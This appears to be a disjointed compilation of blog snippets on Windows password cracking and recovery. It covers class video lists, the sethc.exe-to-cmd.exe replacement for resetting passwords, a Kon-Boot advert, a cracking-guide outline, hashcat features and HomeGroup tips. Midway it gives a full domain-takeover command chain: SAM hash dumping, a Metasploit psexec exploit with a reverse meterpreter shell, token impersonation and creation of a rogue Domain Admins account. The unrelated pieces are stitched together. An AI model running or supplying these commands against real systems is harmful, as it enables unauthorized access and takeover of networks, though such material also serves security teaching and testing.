Lots of password finding and crack topics were covered. Hashcat, OCLHashcat, Cain, SAMDump2, Nir’s Password Recovery Tools, Password Renew, Backtrack 4 R1, UBCD4Win and much more.

Part 1: Topics include: Why exploit local passwords?, Scenario:Imaged Systems, Grabbing local passwords, Hash Examples, Great Resources, Platforms Used: Ubuntu, Backtrack, UBCD4Win, Windows Profile, Windows System Trifecta, Anti-Virus Pains, Getting an account/changing an account password, hash insertion, Sala’s Password Renew, Keyloggers, Boot CD demos, SAMDump2, Browser Passwords, IE, Firefox Etc., PSPV, PasswordFox, IE Passview, ChromePass, RDP and VNC password grabbing, Instant Messaging, Stupid Web Apps rant, AOA: Any Old Asterisks (stuff hidden by Asterisks), Network Shares stored passwords, Outlook PST password cracking and hash collision example, Wireless profile passwords, WirelessKeyView, Sniffing them off the wire with Wireshard and Cain.
Download Class 1

Part 2: The best single video out there for showing Hashcat and OCLHashcat. Lots of info about using Hashcat/OCLHashcat, its advantages, and the power of a video card to boost cracking speed.
Download Class 2

Part 3: Windows LM and NTLM hash cracking, Time Memory Tradeoffs, SAM Cracking Prevention, Linux/Unix passwd and shadow files, Parts of a *nix hash, Windows Cached Domain Credentials, Problems with Windows 7, Cracking Creds Countered, Finding where Unknown Apps store passwords, System Process Monitoring, RegFromApp, ProcessActivityView, Procmon (Process Monitor), finding the hash type, Other Weird Vectors, Inverse Bruteforce, Look in the logs for passwords, upcoming events.
Download Class 3

Please note that resetting the password from an account other than the corresponding user account always means that the user loses the credentials stored in the Windows Vault, stored Internet Explorer passwords, and files that you encrypted with the Encrypting File System (EFS). Of course, if you have a backup of these credentials, you can restore them; likewise, if you have exported the private EFS key, you can import it again after you have reset the password.

Like with all other solutions that allow you to reset the Windows password without having an account on the corresponding computer, you have to boot from a second operating system and access the Windows installation while it is offline.

You can do this with a bootable Windows PE USB stick or by using Windows RE. You can start Windows RE by booting the Windows Vista or Windows 7 setup DVD and then selecting “Repair” instead of “Install Windows.”

By the way, you can’t use the Windows XP boot CD for this purpose because its Recovery Console will ask for a password for the offline installation. However, you can use a Vista or Windows 7 DVD to reset a forgotten Windows administrator password on Windows XP.

This works because Windows RE, which is based on Vista or Windows 7, will let you launch a command prompt with access to an offline installation without requiring a password.

To reset a forgotten administrator password, follow these steps:

1. Boot from Windows PE or Windows RE and access the command prompt.
2. Find the drive letter of the partition where Windows is installed. In Vista and Windows XP, it is usually C:, in Windows 7, it is D: in most cases because the first partition contains Startup Repair. To find the drive letter, type C: (or D:, respectively) and search for the Windows folder. Note that Windows PE (RE) usually resides on X:.
3. Type the following command (replace “c:” with the correct drive letter if Windows is not located on C:):
   copy c:\windows\system32\sethc.exe c:\
   This creates a copy of sethc.exe to restore later.
4. Type this command to replace sethc.exe with cmd.exe:
   copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
5. Reboot your computer and start the Windows installation where you forgot the administrator password.
6. After you see the logon screen, press the SHIFT key five times.
7. You should see a command prompt where you can enter the following command to reset the Windows password (see screenshot above):
   net user you_user_name new_password
   If you don’t know your user name, just type net user to list the available user names.
8. You can now log on with the new password.

I recommend that you replace sethc.exe with the copy you stored in the root folder of your system drive in step 3. For this, you have to boot up again with Windows PE or RE because you can’t replace system files while the Windows installation is online.

Via: 4sysops.com

It also has a bunch of new bug fixes/updates.

1. - Added 64-bit environment support
2. - Added USB support tools (grldr, klmemusb)
3. - Added debugging code to make it easier to track down various compatibility problems
4. - Fixed bug in Windows 7 support failures
5. - Removed Linux support
6. - Many performance improvements to source code
7. - Improved BIOS support by reducing code size significantly

Unfortunately it is no longer free. But for a meager price of $15.99 for a personal license, it gives you free updates and support for a period of 6 months. You can still use it without restrictions after that period.
They also offer a commercial license, for $75.99 with 1 year of support and updates, allowing you to use on business environment.
To purchase Kon Boot v1. 1,visit their website http://www.kryptoslogic.com

We are also giving away 10 personal licenses this week to some lucky readers!!! More details to come!!!

* EFS certificates
* MSN Messenger credentials
* Internet Explorer form passwords
* Outlook passwords
* Google Talk credentials
* Google Chrome form passwords
* Wireless network keys (WEP key and WPA-PMK)
* Skype credentials

Of course you need to know the user’s current password, you can recover it from the SAM.
Download Here
You can also read an excellent article on the undocumented process of recovering DPAPI passwords here

1 LM vs. NTLM
2 Syskey
3 Cracking Windows Passwords
   3.1 Extracting the hashes from the Windows SAM
      3.1.1 Using BackTrack Tools
         3.1.1.1 Using bkhive and samdump v1.1.1 (BT2 and BT3)
         3.1.1.2 Using samdump2 v2.0.1 (BT4)
         3.1.1.3 Cached Credentials
      3.1.2 Using Windows Tools
         3.1.2.1 Using fgdump
         3.1.2.2 Using gsecdump
         3.1.2.3 Using pwdump7
         3.1.2.4 Cached Credentials
   3.2 Extracting the hashes from the Windows SAM remotely
      3.2.1 Using BackTrack Tools
         3.2.1.1 ettercap
      3.2.2 Using Windows Tools
         3.2.2.1 Using fgdump
   3.3 Cracking Windows Passwords
      3.3.1 Using BackTrack Tools
         3.3.1.1 John the Ripper BT3 and BT4
            3.3.1.1.1 Cracking the LM hash
            3.3.1.1.2 Cracking the NTLM hash
            3.3.1.1.3 Cracking the NTLM using the cracked LM hash
            3.3.1.1.4 Cracking cached credentials
         3.3.1.2 John the Ripper - current
            3.3.1.2.1 Get and Compile
            3.3.1.2.2 Cracking the LM hash
            3.3.1.2.3 Cracking the LM hash using known letter(s) in known location(s) (knownforce)
            3.3.1.2.4 Cracking the NTLM hash
            3.3.1.2.5 Cracking the NTLM hash using the cracked LM hash (dumbforce)
            3.3.1.2.6 Cracking cached credentials
         3.3.1.3 Using MDCrack
            3.3.1.3.1 Cracking the LM hash
            3.3.1.3.2 Cracking the NTLM hash
            3.3.1.3.3 Cracking the NTLM hash using the cracked LM hash
         3.3.1.4 Using Ophcrack
            3.3.1.4.1 Cracking the LM hash
            3.3.1.4.2 Cracking the NTLM hash
            3.3.1.4.3 Cracking the NTLM hash using the cracked LM hash
      3.3.2 Using Windows Tools
         3.3.2.1 John the Ripper
            3.3.2.1.1 Cracking the LM hash
            3.3.2.1.2 Cracking the NTLM hash
            3.3.2.1.3 Cracking the NTLM hash using the cracked LM hash
            3.3.2.1.4 Cracking cached credentials
         3.3.2.2 Using MDCrack
            3.3.2.2.1 Cracking the LM hash
            3.3.2.2.2 Cracking the NTLM hash
            3.3.2.2.3 Cracking the NTLM hash using the cracked LM hash
         3.3.2.3 Using Ophcrack
            3.3.2.3.1 Cracking the LM hash
            3.3.2.3.2 Cracking the NTLM hash
            3.3.2.3.3 Cracking the NTLM hash using the cracked LM hash
         3.3.2.4 Using Cain and Abel
      3.3.3 Using a Live CD
         3.3.3.1 Ophcrack
4. Changing Windows Passwords
   4.1 Changing Local User Passwords
      4.1.1 Using BackTrack Tools
         4.1.1.1 chntpw
      4.1.2 Using a Live CD
         4.1.2.1 chntpw
         4.1.2.2 System Rescue CD
   4.2 Changing Active Directory Passwords
5 plain-text.info
6 Cracking Novell NetWare Passwords
7 Cracking Linux/Unix Passwords
8 Cracking networking equipment passwords
   8.1 Using BackTrack tools
      8.1.1 Using Hydra
      8.1.2 Using Xhydra
      8.1.3 Using Medusa
      8.1.4 Using John the Ripper to crack a Cisco hash
   8.2 Using Windows tools
      8.2.1 Using Brutus
9 Cracking Applications
   9.1 Cracking Oracle 11g (sha1)
   9.2 Cracking Oracle passwords over the wire
   9.3 Cracking Office passwords
   9.4 Cracking tar passwords
   9.5 Cracking zip passwords
   9.6 Cracking pdf passwords
10 Wordlists aka Dictionary attack
   10.1 Using John the Ripper to generate a wordlist
   10.2 Configuring John the Ripper to use a wordlist
   10.3 Using crunch to generate a wordlist
   10.4 Generate a wordlist from a textfile or website
   10.5 Using premade wordlists
   10.6 Other wordlist generators
   10.7 Manipulating your wordlist
11 Rainbow Tables
   11.1 What are they?
   11.2 Generating your own
      11.2.1 rcrack - obsolete but works
      11.2.2 rcracki
      11.2.3 rcracki - boinc client
      11.2.4 Generating a rainbow table
   11.3 WEP cracking
   11.4 WPA-PSK
      11.4.1 airolib
      11.4.2 pyrit
12 Distributed Password cracking
   12.1 john
   12.2 medussa (not a typo this is not medusa)
13 using a GPU
   13.1 cuda - nvidia
   13.2 stream - ati

Cracking_Passwords_Guide.pdf

Windows XP could not start because the following file is
missing or corrupt: \WINDOWS\SYSTEM32\CONFIG\SYSTEM

Windows XP could not start because the following file is
missing or corrupt: \WINDOWS\SYSTEM32\CONFIG\SOFTWARE

Stop: c0000218 {Registry File Failure} The registry cannot load the hive (file): \SystemRoot\System32\Config\SOFTWARE or its log or alternate

System error: Lsass.exe
When trying to update a password the return status indicates that the value provided as the current password is not correct.

Sometimes this can be corrected using chkdsk /r /f from recovery console

other times you need to boot into the recovery console using the XP install CD
and use the directions here http://support.microsoft.com/kb/307545 which involves typing a
whole bunch of commands into the console and hope that you dont make any mistakes typing.
Alot of people either lost or don’t have the XP install CD and if you do it’s a pain in
the ass to type all of that.

So the alternative would be to either:
1. boot from WindowsPE type disk and backup/copy the registry hive files to the folders
or
2. slave the drive to another computer and backup/copy the registry hive files to the folders

which is also tedious because you have to copy hive files over,back up old hives, and rename the new hives
This is where HiverestoreXP comes in handy because it automates the process for you.
It’s dead simple to use.

Download HiveRestoreXP

968 downloads

If you are trying to use this on a slaved drive you may not have proper permissions to open the “System Volume Information” folder and the program wont show any restore points, use the instructions here to take gain access before running the program http://support.microsoft.com/kb/309531

most of the time you can run this command:
cacls "driveletter:\System Volume Information" /E /G username:F
then remove the permissions using this:
cacls "driveletter:\System Volume Information" /E /R username

mount /dev/sda1 /mnt/sda1
cd /mnt/sda1/WINDOWS/system32/config
samdump2 system SAM
msfconsole
use windows/smb/psexec
exploit -p windows/meterpreter/reverse_tcp -o LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123...:5654... -j
sessions -i 1
use incognito
list_tokens -u
impersonate_token mydomain\\domainadmin
execute -f cmd.exe -i -t
net user hack MPass5678 /add /domain
net group "Domain Admins" hack /add /domain
PWNED

Lessons learned :
1. never reuse admin passwords, even if they are technically unbreakable
2. everything is a lot easier with the right tools.

Attack is compatible with WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7

The main features of hashcat are:

* It is free.
* Native binaries for Linux and Windows.
* Multi-threaded.

* Supports the following hashes:

* MD5
* md5($pass.$salt)
* md5($salt.$pass)
* md5(md5($pass))
* md5(md5(md5($pass)))
* md5(md5($pass).$salt)
* md5(md5($salt).$pass)
* md5($salt.md5($pass))
* md5($salt.$pass.$salt)
* md5(md5($salt).md5($pass))
* md5(md5($pass).md5($salt))
* md5($salt.md5($salt.$pass))
* md5($salt.md5($pass.$salt))
* md5($username.0.$pass)
* md5(strtoupper(md5($pass)))
* SHA1
* sha1($pass.$salt)
* sha1($salt.$pass)
* sha1(sha1($pass))
* sha1(sha1(sha1($pass)))
* MySQL
* MySQL4.1/MySQL5
* MD5(WordPress)
* MD5(phpBB3)
* MD5(Unix)
* SHA-1(Base64)
* SSHA-1(Base64)

* Supports the following attacks:

* Straight-Words Attack
* Combination-Words Attack
* Toggle-Case Attack
* Brute-Force Attack

* All Attack-Modes except Brute-Force can be extended by Hybrid-Attack rules.
* Hybrid-Attack engine is mostly compatible with JTR / PasswordsPro.
* Possible to resume or limit session.

It also has some special features:

* Automatically recognizes already recovered hashes from outfile at startup.
* Automatically generate random rules for Hybrid-Attack.
* Load hashlist that include more than 3 million hashes of any supported type at once.
* Load saltlist from external file and then use them in a Brute-Force Attack variant.
* Able to work in an distributed environment.

There are some more things you should know:

* You can specify multiple wordlists and also multiple directories of wordlists.
* Number of threads can be configured.
* Threads run on lowest priority.

Get It Here: hashcat

HomeGroup makes it easy to share pictures, music, documents, videos, and printers with other people on your home network. You would have had to created a homegroup first before you will have a password to use to join other computer to your homegroup.

1. Open the Control Panel (all items view), and click on the Network and Sharing Center icon.
2. Click on the Choose homegroup and sharing options link.
3. Click on the View or print homegroup password link.
4. Write down this password down, or click on Print this page to print the passoword. When done, close this window.

NOTE: The password is case sensitive, so it will need to be typed exactly as it appears here when used to join a computer to the homegroup.

http://securitytube.net/How-to-own-a-Windows-Domain-video.aspx